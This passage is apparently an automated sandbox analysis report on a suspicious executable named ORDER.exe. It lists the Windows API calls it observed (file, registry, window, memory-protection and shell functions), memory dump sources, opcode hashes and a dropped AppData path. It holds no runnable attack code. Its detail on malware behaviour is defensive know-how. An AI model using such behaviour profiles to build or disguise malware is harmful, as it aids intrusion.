                          • C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike, xrefs: 00401E09
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: ExecuteShell
                          • String ID: C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike
                          • API String ID: 587946157-4182428349
                          • Opcode ID: 66519f536f70328b3ce23f8ed94e950144d2fd5449f9bef0e6ae71cafd5ff2e4
                          • Instruction ID: 92cbb6ba42742382510c3a8e41a68a30635fa0dc9ae6a59fa4a75f74f7b170a3
                          • Opcode Fuzzy Hash: 66519f536f70328b3ce23f8ed94e950144d2fd5449f9bef0e6ae71cafd5ff2e4
                          • Instruction Fuzzy Hash: 8DF0F6B3B041047ACB41ABB59E4AE5D2BA4EB41718F240A3BF400F71C2DAFC8841F728
                          APIs
                          • SetFilePointer.KERNELBASE(00000000), ref: 100028AB
                          • GetLastError.KERNEL32 ref: 100029B2
                          Memory Dump Source
                          • Source File: 00000000.00000002.32238167410.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.32238142205.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238195639.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238224100.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_ORDER.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                          • Instruction ID: 2b4501ff186f60f2b29b8b71d76009b37135a14f8b8ad132536a4a21bb517402
                          • Opcode Fuzzy Hash: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
                          • Instruction Fuzzy Hash: 9E51A4BA908214DFFB14DF60DCC5B5937A8EB443D4F218429EA08E725DDF38A981CB94
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                          • Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
                          • Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                          • Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                          APIs
                          • ShowWindow.USER32(00000000,00000000,?), ref: 00401DC2
                          • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Window$EnableShow
                          • String ID:
                          • API String ID: 1136574915-0
                          • Opcode ID: 5d4156b77268c72d9e3eaff2de93184d03509ee6b077f4337f4a820dda01516b
                          • Instruction ID: 18ac702c75a7039fec00373c4f699ed09bc4c8ec852dd7b5b9a0ef8cb6e9c66a
                          • Opcode Fuzzy Hash: 5d4156b77268c72d9e3eaff2de93184d03509ee6b077f4337f4a820dda01516b
                          • Instruction Fuzzy Hash: 39E0CD72B04110EBCB10BBB45D4A55E3374DF10359B10443BF501F11C1D2B85C40565D
                          APIs
                          • GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ORDER.exe,80000000,00000003), ref: 004059CB
                          • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059ED
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                          • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                          • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                          • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                          APIs
                          • GetFileAttributesA.KERNELBASE(?,?,004055BA,?,?,00000000,0040579D,?,?,?,?), ref: 004059A7
                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                          • Instruction ID: a98ca5448702c3e829ea1667e49b0be7f6aa4c87fef4348ac0342a167d80fd98
                          • Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
                          • Instruction Fuzzy Hash: 19D0C9B2918120EBC2102728AD0889BBF69EB542717018B31F865A22B0C7304C52DAA9
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: wsprintf
                          • String ID:
                          • API String ID: 2111968516-0
                          • Opcode ID: 782d5d7a015de57d641f2625727537b2e8a64e8a203226d51b7ee4238bd53e1d
                          • Instruction ID: 80d1f72451bcef36c881c8715d37a41c16cfaf5c23ac720a97db8ffa6bd4d959
                          • Opcode Fuzzy Hash: 782d5d7a015de57d641f2625727537b2e8a64e8a203226d51b7ee4238bd53e1d
                          • Instruction Fuzzy Hash: C121D870D05295BEDF229F644A581EEBBB09B05304F64407FE491BA3C5E1BC9A82CB2D
                          APIs
                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: PrivateProfileStringWrite
                          • String ID:
                          • API String ID: 390214022-0
                          • Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                          • Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
                          • Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
                          • Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025ED
                            • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: FilePointerwsprintf
                          • String ID:
                          • API String ID: 327478801-0
                          • Opcode ID: f6b622efafe1ba94147637c824cd162c2e50e451d5b8b7382d4d1d46b47572d6
                          • Instruction ID: 0a8c9e11f48196ea829b02b8213bca88da5b23a5d36cc3de3ae654890f4390ea
                          • Opcode Fuzzy Hash: f6b622efafe1ba94147637c824cd162c2e50e451d5b8b7382d4d1d46b47572d6
                          • Instruction Fuzzy Hash: E4E04FB6A04220BBDB01BBA59E4ADBF6768EB50309B14853BF501F40C1D3BD4802962E
                          APIs
                          • RegOpenKeyExA.KERNELBASE(00000000,0000044B,00000000,00000022,00000000,?,?), ref: 00402B2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                          • Instruction ID: 087740a894708ae54e311fe38564fcb001a0ed9e3d0f4d4a62d19f1d4de25a1d
                          • Opcode Fuzzy Hash: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
                          • Instruction Fuzzy Hash: 38E046B6250108AADB40EFA4EE4AF9537ECFB04700F008021BA08E7091CA78E5509B69
                          APIs
                          • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A53
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                          • Instruction ID: 55609983f428609d3339a900fe5ea2c3161a13bcf9e808ef2cae39733250456b
                          • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                          • Instruction Fuzzy Hash: F7E08C3231025AABDF109EA09C40AEB3B6CEB00760F084432FA14E2040D230E9218FA5
                          APIs
                          • VirtualProtect.KERNELBASE(1000404C,?,?,1000403C), ref: 1000272D
                          Memory Dump Source
                          • Source File: 00000000.00000002.32238167410.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.32238142205.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238195639.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238224100.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_ORDER.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                          • Instruction ID: 4dab7c069dd6fc30f8915db09394f7f991a1b088a201bba37056324bf7fcc065
                          • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                          • Instruction Fuzzy Hash: 98F09BF19092A0DEF360DF688CC47063FE4E3993D5B03852AE358F6269EB7441448B19
                          APIs
                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID:
                          • API String ID: 1096422788-0
                          • Opcode ID: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                          • Instruction ID: 1024819f7f1d2ea578916dba6ac29c28ac22902c13986e1de9ff5d702d2d6265
                          • Opcode Fuzzy Hash: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                          • Instruction Fuzzy Hash: B9E08671A44209BADB406FA08E09EBD3668BF01710F10013AF9507B0D1EBB88442F72D
                          APIs
                          • SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015A0
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: c66d089d5a2f634c2935052129529c912c52a98a4509ae0e2fc4e9bc41e15f47
                          • Instruction ID: bed2877986d8c12a83e01492d596720214e57a472dec7050afa6ab6fccae40cd
                          • Opcode Fuzzy Hash: c66d089d5a2f634c2935052129529c912c52a98a4509ae0e2fc4e9bc41e15f47
                          • Instruction Fuzzy Hash: 17D01277B08114E7DB00DBB5AE48A9E73A4FB50325F208637D111F11D0D3B98551A629
                          APIs
                          • SendMessageA.USER32(00010474,00000000,00000000,00000000), ref: 0040404A
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                          • Instruction ID: af7fd4c3fc1dda8ad1a195a9021ea177fcc43fc0d0bb539f8953ea950d20d41d
                          • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                          • Instruction Fuzzy Hash: DFC09B717443007BEA31DB509D49F077758A750B00F5584357320F50D0C6B4F451D62D
                          APIs
                          • SendMessageA.USER32(?,?,?,00403E52), ref: 0040402F
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                          • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                          • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                          • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                          • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                          • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                          • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                          APIs
                          • KiUserCallbackDispatcher.NTDLL(?,00403DEB), ref: 00404018
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
